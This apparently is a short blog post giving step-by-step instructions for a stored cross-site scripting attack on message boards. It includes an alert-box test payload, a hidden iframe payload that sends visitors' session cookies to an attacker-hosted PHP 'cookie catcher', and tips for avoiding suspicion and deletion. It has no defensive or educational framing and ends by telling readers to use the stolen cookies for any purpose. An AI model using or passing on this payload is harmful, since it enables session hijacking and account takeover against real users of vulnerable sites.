..::Hack website Using Cross Site Scripting::..
=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* =*
1) Find a vulnerable site where you can post content. A message board is a good example. Remember, if the site is secure then this will not work.
2) Go to create a post. You will need to type some special code into the “post” which will capture the data of all who click on it.
You’ll want to test to see if the system filters out code. Post <script...>alert(“test”)</ ...script> (but remove the “…”). If an alert box appears when you click on your post, then the site is vulnerable to attack.
3) Create and upload your cookie catcher. The goal of this attack is to capture a user’s cookies, which allows you access to their account for websites with vulnerable logins. You’ll need a cookie catcher, which will capture your target’s cookies and reroute them. Upload the catcher to a website you have access to and that supports php. An example cookie catcher code can be found in the sample section.
4) Post with your cookie catcher. Input a proper code into the post which will capture the cookies and sent them to your site. You will want to put in some text after the code to reduce suspicion and keep your post from being deleted.
An example code would look like
<...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(documen t.location=”YOURURL/ cookiecatcher.php?c=”+document. cookie)><.../iframe> (but remove the ...).
5) Use the collected cookies. After this, you can use the cookie information, which should be saved to your website, for whatever purpose you need.
No comments:
Post a Comment